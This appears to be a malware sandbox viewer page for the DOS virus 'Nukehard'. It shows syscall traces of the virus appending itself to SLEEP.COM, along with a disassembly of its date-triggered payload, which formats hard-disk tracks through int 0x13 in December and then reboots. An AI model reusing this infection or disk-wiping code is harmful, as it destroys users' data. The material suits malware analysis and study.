Sample viewer

vx.netlux.org/Virus.DOS.NED.Nukehard

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:40:55.438589887Z 47 PC: 12aee | Get disk transfer address
2018-12-17T22:40:55.445168863Z 26 PC: 12af6 | Set disk transfer address
2018-12-17T22:40:55.44627998Z 47 PC: 12b48 | Get disk transfer address
2018-12-17T22:40:55.447606281Z 26 PC: 12b57 | Set disk transfer address
2018-12-17T22:40:55.44905363Z 78 PC: 12b5f | Find first file
2018-12-17T22:40:55.454606399Z 47 PC: 12b77 | Get disk transfer address
2018-12-17T22:40:55.455816121Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:55.461138157Z 63 PC: 12b9c | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:40:55.466951365Z 66 PC: 12ba4 | Move file pointer
2018-12-17T22:40:55.468350584Z 62 PC: 12ba9 | Close file
2018-12-17T22:40:55.470109578Z 67 PC: 12bca | Get or set file attributes
2018-12-17T22:40:55.48873476Z 61 PC: 12bcf | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:55.49634852Z 64 PC: 12bdb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:40:55.503935961Z 66 PC: 12be3 | Move file pointer
2018-12-17T22:40:55.509555255Z 64 PC: 12c06 | Write file or device (Write 1837 bytes on handle 5)
2018-12-17T22:40:55.519651197Z 87 PC: 12c11 | Get or set file date and time
2018-12-17T22:40:55.521604165Z 62 PC: 12c15 | Close file
2018-12-17T22:40:55.532325052Z 67 PC: 12c22 | Get or set file attributes
2018-12-17T22:40:55.542521523Z 26 PC: 12b71 | Set disk transfer address
2018-12-17T22:40:55.543683596Z 26 PC: 12afe | Set disk transfer address
2018-12-17T22:40:55.545145501Z 42 PC: 12b18 | Get date 0x12b18: cmp dh, 0xc
0x12b1b: jne 0x12b33
0x12b1d: mov ch, 0
0x12b1f: mov ah, 5
0x12b21: mov dh, 0
0x12b23: mov dl, 0x80
0x12b25: int 0x13
0x12b27: inc ch
0x12b29: cmp ch, 0x20
0x12b2c: loopne 0x12b1f
0x12b2e: ljmp 0xffff:0xfff0
0x12b33: pop ax
0x12b34: pop dx
0x12b35: lea dx, word ptr [di + 0x170]
0x12b39: call 0x12b43
0x12b3c: ret
0x12b3d: sub ch, byte ptr [0x4f43]
0x12b41: dec bp
0x12b42: add byte ptr [di - 0x4c], dl
0x12b45: das

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7099,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:51.283641482Z 47 PC: 12aee | Get disk transfer address
2018-12-25T12:00:51.285624191Z 26 PC: 12af6 | Set disk transfer address
2018-12-25T12:00:51.286568922Z 47 PC: 12b48 | Get disk transfer address
2018-12-25T12:00:51.287514423Z 26 PC: 12b57 | Set disk transfer address
2018-12-25T12:00:51.289571307Z 78 PC: 12b5f | Find first file
2018-12-25T12:00:51.295823631Z 47 PC: 12b77 | Get disk transfer address
2018-12-25T12:00:51.297312567Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:51.303681244Z 63 PC: 12b9c | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:00:51.31006406Z 66 PC: 12ba4 | Move file pointer
2018-12-25T12:00:51.311372844Z 62 PC: 12ba9 | Close file
2018-12-25T12:00:51.313016659Z 67 PC: 12bca | Get or set file attributes
2018-12-25T12:00:51.333048988Z 61 PC: 12bcf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:51.342592295Z 64 PC: 12bdb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:00:51.349134662Z 66 PC: 12be3 | Move file pointer
2018-12-25T12:00:51.355636146Z 64 PC: 12c06 | Write file or device (Write 1836 bytes on handle 5)
2018-12-25T12:00:51.364146139Z 87 PC: 12c11 | Get or set file date and time
2018-12-25T12:00:51.365850373Z 62 PC: 12c15 | Close file
2018-12-25T12:00:51.374866854Z 67 PC: 12c22 | Get or set file attributes
2018-12-25T12:00:51.391886377Z 26 PC: 12b71 | Set disk transfer address
2018-12-25T12:00:51.395339287Z 26 PC: 12afe | Set disk transfer address
2018-12-25T12:00:51.397021983Z 42 PC: 12b18 | Get date 0x12b18: cmp dh, 0xc
0x12b1b: jne 0x12b33
0x12b1d: mov ch, 0
0x12b1f: mov ah, 5
0x12b21: mov dh, 0
0x12b23: mov dl, 0x80
0x12b25: int 0x13
0x12b27: inc ch
0x12b29: cmp ch, 0x20
0x12b2c: loopne 0x12b1f
0x12b2e: ljmp 0xffff:0xfff0
0x12b33: pop ax
0x12b34: pop dx
0x12b35: lea dx, word ptr [di + 0x170]
0x12b39: call 0x12b43
0x12b3c: ret
0x12b3d: sub ch, byte ptr [0x4f43]
0x12b41: dec bp
0x12b42: add byte ptr [di - 0x4c], dl
0x12b45: das
2018-12-25T12:00:51.402962496Z 47 PC: 12b48 | Get disk transfer address (See above)
2018-12-25T12:00:51.404351862Z 26 PC: 12b57 | Set disk transfer address (See above)
2018-12-25T12:00:51.405860688Z 78 PC: 12b5f | Find first file (See above)
2018-12-25T12:00:51.412855372Z 47 PC: 12b77 | Get disk transfer address (See above)
2018-12-25T12:00:51.414809962Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:00:51.421634697Z 63 PC: 12b9c | Read file or device (See above)
2018-12-25T12:00:51.431001266Z 66 PC: 12ba4 | Move file pointer (See above)
2018-12-25T12:00:51.432425082Z 62 PC: 12ba9 | Close file (See above)
2018-12-25T12:00:51.434066611Z 79 PC: 12b5f | Find next file (See above)
2018-12-25T12:00:51.437206508Z 47 PC: 12b77 | Get disk transfer address (See above)
2018-12-25T12:00:51.43838219Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:00:51.444812807Z 63 PC: 12b9c | Read file or device (See above)
2018-12-25T12:00:51.45341196Z 66 PC: 12ba4 | Move file pointer (See above)
2018-12-25T12:00:51.454892656Z 62 PC: 12ba9 | Close file (See above)
2018-12-25T12:00:51.456672514Z 67 PC: 12bca | Get or set file attributes (See above)
2018-12-25T12:00:51.474513466Z 61 PC: 12bcf | Open file (See above)
2018-12-25T12:00:51.481152696Z 64 PC: 12bdb | Write file or device (See above)
2018-12-25T12:00:51.484231441Z 66 PC: 12be3 | Move file pointer (See above)
2018-12-25T12:00:51.488862216Z 64 PC: 12c06 | Write file or device (See above)
2018-12-25T12:00:51.498084349Z 87 PC: 12c11 | Get or set file date and time (See above)
2018-12-25T12:00:51.499611862Z 62 PC: 12c15 | Close file (See above)
2018-12-25T12:00:51.508451344Z 67 PC: 12c22 | Get or set file attributes (See above)
2018-12-25T12:00:51.518451593Z 26 PC: 12b71 | Set disk transfer address (See above)
2018-12-25T12:00:51.519583688Z 9 PC: 12a47 | Display string (String= 'IT'S HARD DROPPER - SMAUG�T�����W���>e�ؐ��1F��{E�����Ku��Dҍ+�}7ê�y?�ʝ�B�؁/Ӌ�<���Ӌ�8��ю')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7099,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:51.384288892Z 47 PC: 12aee | Get disk transfer address
2018-12-25T12:00:51.385891052Z 26 PC: 12af6 | Set disk transfer address
2018-12-25T12:00:51.38716079Z 47 PC: 12b48 | Get disk transfer address
2018-12-25T12:00:51.388135939Z 26 PC: 12b57 | Set disk transfer address
2018-12-25T12:00:51.389145204Z 78 PC: 12b5f | Find first file
2018-12-25T12:00:51.395114404Z 47 PC: 12b77 | Get disk transfer address
2018-12-25T12:00:51.396040237Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:51.400377954Z 63 PC: 12b9c | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:00:51.4128365Z 66 PC: 12ba4 | Move file pointer
2018-12-25T12:00:51.413915316Z 62 PC: 12ba9 | Close file
2018-12-25T12:00:51.41518102Z 67 PC: 12bca | Get or set file attributes
2018-12-25T12:00:51.428244731Z 61 PC: 12bcf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:51.433080214Z 64 PC: 12bdb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:00:51.436624726Z 66 PC: 12be3 | Move file pointer
2018-12-25T12:00:51.442152503Z 64 PC: 12c06 | Write file or device (Write 1844 bytes on handle 5)
2018-12-25T12:00:51.453171534Z 87 PC: 12c11 | Get or set file date and time
2018-12-25T12:00:51.455365244Z 62 PC: 12c15 | Close file
2018-12-25T12:00:51.464915633Z 67 PC: 12c22 | Get or set file attributes
2018-12-25T12:00:51.477882431Z 26 PC: 12b71 | Set disk transfer address
2018-12-25T12:00:51.479266298Z 26 PC: 12afe | Set disk transfer address
2018-12-25T12:00:51.480941253Z 42 PC: 12b18 | Get date 0x12b18: cmp dh, 0xc
0x12b1b: jne 0x12b33
0x12b1d: mov ch, 0
0x12b1f: mov ah, 5
0x12b21: mov dh, 0
0x12b23: mov dl, 0x80
0x12b25: int 0x13
0x12b27: inc ch
0x12b29: cmp ch, 0x20
0x12b2c: loopne 0x12b1f
0x12b2e: ljmp 0xffff:0xfff0
0x12b33: pop ax
0x12b34: pop dx
0x12b35: lea dx, word ptr [di + 0x170]
0x12b39: call 0x12b43
0x12b3c: ret
0x12b3d: sub ch, byte ptr [0x4f43]
0x12b41: dec bp
0x12b42: add byte ptr [di - 0x4c], dl
0x12b45: das